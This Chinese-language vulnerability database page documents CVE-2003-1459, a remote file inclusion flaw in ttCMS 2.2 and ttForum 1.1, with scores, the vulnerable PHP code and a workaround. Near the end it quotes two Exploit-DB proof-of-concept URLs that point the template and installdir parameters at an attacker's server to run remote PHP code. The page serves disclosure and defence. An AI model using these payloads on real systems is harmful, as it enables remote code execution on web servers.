CVE-2003-1459
CVSS6.8
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:59
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in ttCMS 2.2 and ttForum allow remote attackers to execute arbitrary PHP code via the (1) template parameter in News.php or (2) installdir parameter in install.php.


[CNNVD]ttCMS / ttForum远程文件包含漏洞(CNNVD-200312-140)

        
        ttCMS/ttForum是两款基于WEB的论坛程序。
        ttCMS/ttForum包含的多个脚本对用户提供的输入缺少正确过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
        ttCMS/ttForum包含的modules/forum/News.php脚本包含如下代码:
        include($template . '.' . $ext);
        此变量用于从用户输入中直接获得包含文件,由于没有进行初始化,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给$template变量,可导致以WEB服务进程权限执行PHP文件中包含的恶意代码。
        ttForum/ttCMS包含的install.php脚本也存在此漏洞,包含如下代码:
        ("$installdir/Settings.php")
        由于没有对$installdir变量进行正确处理,可导致以WEB进程权限执行PHP文件中包含的恶意代码。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:ttcms:ttcms:2.2
cpe:/a:ttcms:ttforum:1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1459
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1459
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-140
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/12271
(UNKNOWN)  XF  ttcms-ttforum-file-include(12271)
http://www.securityfocus.com/bid/7542
(UNKNOWN)  BID  7542
http://www.securityfocus.com/archive/1/321000
(UNKNOWN)  BUGTRAQ  20030509 ttcms and ttforum exploits
http://securityreason.com/securityalert/3278
(UNKNOWN)  SREASON  3278

- 漏洞信息

ttCMS / ttForum远程文件包含漏洞
中危 输入验证
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        ttCMS/ttForum是两款基于WEB的论坛程序。
        ttCMS/ttForum包含的多个脚本对用户提供的输入缺少正确过滤,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
        ttCMS/ttForum包含的modules/forum/News.php脚本包含如下代码:
        include($template . '.' . $ext);
        此变量用于从用户输入中直接获得包含文件,由于没有进行初始化,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给$template变量,可导致以WEB服务进程权限执行PHP文件中包含的恶意代码。
        ttForum/ttCMS包含的install.php脚本也存在此漏洞,包含如下代码:
        ("$installdir/Settings.php")
        由于没有对$installdir变量进行正确处理,可导致以WEB进程权限执行PHP文件中包含的恶意代码。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 编辑php.ini文件,设置'allow_url_fopen'和'register_globals'选项为'off'。
        厂商补丁:
        ttCMS
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ttcms.com

        ttForum
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ttforum.com

- 漏洞信息 (22577)

ttCMS 2.2 / ttForum 1.1 News.php template Parameter Remote File Inclusion (EDBID:22577)
php webapps
2003-05-09 Verified
0 Charles Reinold
N/A [点击下载]
source: http://www.securityfocus.com/bid/7542/info

A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.

Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.

There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.


http://www.example.com/ttforum/index.php?action=news;board=1;
template=http://www.yourserver.com/modules/forum/helpadmin;ext=help		

- 漏洞信息 (22578)

ttCMS 2.2 / ttForum 1.1 install.php installdir Parameter Remote File Inclusion (EDBID:22578)
php webapps
2003-05-09 Verified
0 Charles Reinold
N/A [点击下载]
source: http://www.securityfocus.com/bid/7542/info
 
A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.
 
Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.
 
There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.

http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php 		

- 漏洞信息

54041
ttCMS / ttforum News.php template Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2003-05-09 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站